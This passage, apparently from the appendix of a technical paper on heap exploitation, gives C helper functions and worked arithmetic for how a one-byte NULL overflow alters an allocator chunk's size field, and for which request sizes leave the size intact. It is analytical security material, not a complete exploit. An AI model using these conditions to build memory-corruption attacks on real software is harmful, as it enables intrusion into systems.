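    *a = c2 / g;
    *b = c1 / g;
}

/* Size field after a one-byte NULL overflow into its lowest byte
 * (little-endian layout assumed). */
static uint64_t after_null_byte(uint64_t size_field)
{
    return size_field & ~(uint64_t)0xff;
}

/* Pre-condition of Figure A.7: the NULL byte clears only the P bit
 * and leaves the chunk size itself intact. */
static bool null_byte_keeps_size(uint64_t req)
{
    uint64_t size_field = chunk_size(req) | PREV_INUSE;
    return after_null_byte(size_field) == chunk_size(req);
}
```

For example, under these assumptions the requests 0x88 and 0xb8 map to chunk sizes 0x90 and 0xc0, so unaligned_counts() yields a = 4 and b = 3 (both sides cover 0x240 bytes). Likewise, a request of 0xf8 gives a chunk size of 0x100, for which the off-by-one NULL changes the size field from 0x101 to 0x100, whereas a chunk size of 0x90 would be zeroed out entirely.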
